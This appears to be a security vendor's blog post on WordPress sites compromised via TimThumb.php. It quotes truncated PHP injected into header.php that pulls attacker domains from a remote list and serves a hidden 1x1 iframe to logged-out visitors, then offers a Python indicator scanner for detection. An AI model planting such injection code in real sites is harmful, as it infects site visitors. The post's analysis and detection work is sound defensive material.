We have been talking a lot lately about the Timthumb.php vulnerability and the importance of updating the script as soon as possible. Sites that didn’t update it are getting compromised very easily. We explained it in more detail here: Mass infection of WordPress sites because of TimThumb.php.
What we are seeing now is a small modification to the attack method. Instead of modifying the .htaccess or infecting the jquery.js or l10n.js scripts within WordPress core, they are modifying the header.php of the compromised WordPress site with this code:
```php
<!-- Wordpress Counter -->
if ( !is_user_logged_in() && !isset ( $_COOKIE['MTPT'] ) ) {
if ( get_option ( 'domain_update' ) === FALSE && ( $newdomain = ..
add_option ( 'domain', $newdomain, '', 'no' );
add_option ( 'domain_update', time (), '', 'no' );
if ( time () - get_option ( 'domain_update' ) > 10*60 && ( $newdomain = ..
update_option ( 'domain', $newdomain );
update_option ( 'domain_update', time () );
}
$domain = get_option ( 'domain' );
if ($domain)
'<script language="javascript">
var ExpDate = new Date ();
ExpDate.setTime(ExpDate.getTime() + (7 * 24 * 60 * 60));
SetCookie("MTPT","1",ExpDate, "/");
function SetCookie (name, value) {
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
<iframe src="http://' . $domain . '/kwizhveo.php" width="1" height="1"
}
function get_new_domain () {
$url = 'http://googlesafebrowsing.com/remoted.cc.txt';
if ( function_exists ( 'curl_init' ) ) {
$ch = @curl_init ( $url );
@curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, TRUE );
$doms = @curl_exec ( $ch );
@curl_close ( $ch );
$doms = @file_get_contents ( $url );
if ( strpos ( $doms, '||' ) === false )
return false;
$domains = explode ( '||', trim ( $doms ) );
return $domains[array_rand ( $domains )];
?><!-- Wordpress Counter -->
```
What this code does is very simple. It connects to http://googlesafebrowsing.com/remoted.cc.txt, picks a domain from the list it gets back, caches that domain in the wp_options table, and uses it to inject a hidden 1x1 iframe into the page in an attempt to infect everyone visiting the site. Visitors who are logged in or who already carry the MTPT cookie are skipped, which is why site owners browsing their own site often see nothing. Domains seen so far include:
(and many others)
All the domains are hosted at and in the .us.to top level domain. If your site is compromised, you can scan it here: http://sitecheck.sucuri.net.
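For site owners who want a local check before (or alongside) the online scanner, here is an added example, not code from the original post or from Sucuri, that scans a theme directory for the indicators present in the injection quoted above (the marker comment, the MTPT cookie gate, the domain options, the remote domain list URL and the 1x1 iframe). The sample header contents are constructed for the test and are not real captures.

```python
"""Flag the header.php injection described above in WordPress theme files."""
import re
from pathlib import Path

# Indicators lifted from the injected code quoted on this page.
INDICATORS = {
    # HTML comment the injection is wrapped in
    "marker_comment": re.compile(r"<!--\s*Wordpress Counter\s*-->", re.I),
    # only fires for logged-out visitors without the MTPT cookie
    "cookie_gate": re.compile(
        r"!is_user_logged_in\s*\(\s*\)\s*&&\s*!isset\s*\(\s*\$_COOKIE\s*\[\s*['\"]MTPT['\"]\s*\]", re.I),
    # iframe host cached in wp_options under 'domain' / 'domain_update'
    "domain_option": re.compile(r"(add|get|update)_option\s*\(\s*['\"]domain(_update)?['\"]", re.I),
    # remote list the script pulls a fresh host from
    "remote_domain_list": re.compile(r"googlesafebrowsing\.com/remoted\.cc\.txt", re.I),
    # 1x1 iframe pointing at the chosen host
    "hidden_iframe": re.compile(r"<iframe[^>]*width=\"1\"[^>]*height=\"1\"", re.I),
}

def scan_text(text):
    """Return the sorted names of indicators found in a file's contents."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def scan_theme(theme_dir):
    """Map each .php file under theme_dir to its indicator list (hits only)."""
    hits = {}
    for path in Path(theme_dir).rglob("*.php"):
        found = scan_text(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

# Constructed samples: a trimmed stand-in for the injection, and a clean header.
INFECTED_HEADER = '''<head><?php wp_head(); ?></head>
<!-- Wordpress Counter --><?php
if ( !is_user_logged_in() && !isset ( $_COOKIE['MTPT'] ) ) {
  $domain = get_option ( 'domain' );
  if ($domain) echo '<iframe src="http://' . $domain . '/x.php" width="1" height="1"></iframe>';
}
$url = 'http://googlesafebrowsing.com/remoted.cc.txt';
?><!-- Wordpress Counter -->'''
CLEAN_HEADER = '<head><?php wp_head(); ?></head>\n' \
               '<iframe src="https://example.org/widget" width="300" height="250"></iframe>'

if __name__ == "__main__":
    print(scan_text(INFECTED_HEADER))  # all five indicator names
    print(scan_text(CLEAN_HEADER))     # []
```

Run `scan_theme("wp-content/themes")` against a site to list every PHP file that carries one or more of these indicators; a single hit on `hidden_iframe` alone may be a legitimate tracking pixel, so look at the file before cleaning.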
If you need help cleaning up, sign up here: http://sucuri.net/signup